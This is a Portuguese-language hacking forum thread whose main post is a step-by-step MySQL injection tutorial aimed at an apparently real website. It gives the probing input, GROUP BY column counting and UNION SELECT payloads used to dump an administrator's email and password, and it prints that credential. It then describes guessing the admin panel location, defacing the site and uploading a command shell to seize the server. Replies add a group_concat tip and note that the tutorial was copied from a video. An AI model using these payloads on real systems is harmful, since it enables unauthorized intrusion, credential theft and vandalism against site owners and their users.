Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Sql

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Tutorial Sql

    MySQL Injection
    Site para estudo: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    Arquivo vulnerável:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Primeiro retiramos o “14” e colocamos o -1’ ;
    Assim saberemos se o site está vulnerável

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    Apareceu o sequinte erro:
    SQL ERROR: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
    O site está vulnerável !
    Vamos saber agora quantas colunas o site tem, colocamos o group by 1 para saber se tem a coluna 1
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... group by 1
    Se não aparecer nada existe essa coluna e se aparecer o erro, não existe a coluna.
    Esse site tem 3 colunas então o link:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... group by 3
    Não vai retornar nenhum erro.
    e o link:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... group by 4
    retorna um erro.
    Então descobrimos que o site tem 3 colunas agora vamos fazer o código union:
    union all select 1,2,3
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3


    Podemos visualizar a coluna 2 e 3.
    Agora vamos achar o nome da tabela do site tentando várias possibilidades.
    Vamos lá !
    Código: union all select 1,2,3 from ”nome da tabela”--
    O nome da tabela desse site é “administradores” mas poderia ser “user, username, usuários, admin, nome, nomes” etc...
    Se aparecer a mesma imagem de antes sem erro é que essa é a tabela correta.
    Se aparecer o erro significa que a tabela está incorreta.
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... UNION all SELECT 1,2,3 from administradores—
    Agora é só você substituir a tabela 2 ou 3 por o nome da coluna que tenha os logins e senha do administrador, você também tem que ir testando , os nomes podem ser “usuário, username,root,admin,user,password,senha,pass,login ,nome,name,email”
    para achar o usuário você coloca:
    union all select 1,email,2,3 from administradores--
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,email,3 from administradores-
    irá aparecer o nome do e-mail que nesse caso é o login do administrador, mas na maioria das vezes o login é um nome mesmo.



    Agora vamos descobrir a senha, usaremos a coluna número 3, assim nossa página terá o e-mail na coluna 2 e a senha na coluna 3 mostradas na tela, caso haja erro no nome da coluna da senha, não aparecerá nada, assim sabemos que erramos o nome da coluna.

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,email,senha from administradores-
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Agora temos o login e senha, nosso login é bruno@ploo.com.br e a senha é 123mudar, então entraremos no painel do administrador para podermos altera a index ou até enviar uma cmd para o servidor e tentar ganhar acesso a todo servidor.
    Tentaremos achar a pagina do administrador na força bruta, testando mesmo, existem centenas de possibilidades mas as mais comuns são Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ; Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ; Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
    Nesse caso o painel do administrador fica em
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Agora é só entramos no painel do administrador.



    Estamos como administrador da página agora, podemos fazer um deface postando uma noticia, enviando uma cmd no local de enviar fotos da noticia ou em qualquer e outra sessão que aceite upload, para tentar ganhar acesso a todo servidor, porém nem sempre será possível fazer upload.







    @editado
    Fonte: st4lkr
    Tags: Nenhum(a)
    • Top
  • Font Size
    #2
    Agora vamos achar o nome da tabela do site tentando várias possibilidades.
    Vamos lá !
    Código: union all select 1,2,3 from ”nome da tabela”--
    O nome da tabela desse site é “administradores” mas poderia ser “user, username, usuários, admin, nome, nomes” etc...
    Se aparecer a mesma imagem de antes sem erro é que essa é a tabela correta.
    Se aparecer o erro significa que a tabela está incorreta.
    Não precisa chutar. Você pode usar o group_concat para achar o nome das tabelas e colunas.

    Abraço




    "Antes de conseguir você tem que acreditar."

    • Top

    Comment

    • Font Size
      #3
      Bem,hj eu estava dando uma olhada por aê no youtube e vi esse video:[ame="http://www.youtube.com/watch?v=dmnscGMXF-Y&feature=related"]http://www.youtube.com/watch?v=dmnscGMXF-Y&feature=related[/ame]
      O cara faiz tudo que vc fez,e ainda é o mesmo site.
      Coincidencia não ?


      sigpic
      • Top

      Comment

      • Font Size
        #4
        hã sim
        eu esqueci de por os creditos foi malz peço desculpa é que eu tava atrazado kkk
        o tuto não foi eu que fiz eu achei na net ta só compartilhando
        • Top

        Comment

        Anterior template Avançar
        X
        Working...
        X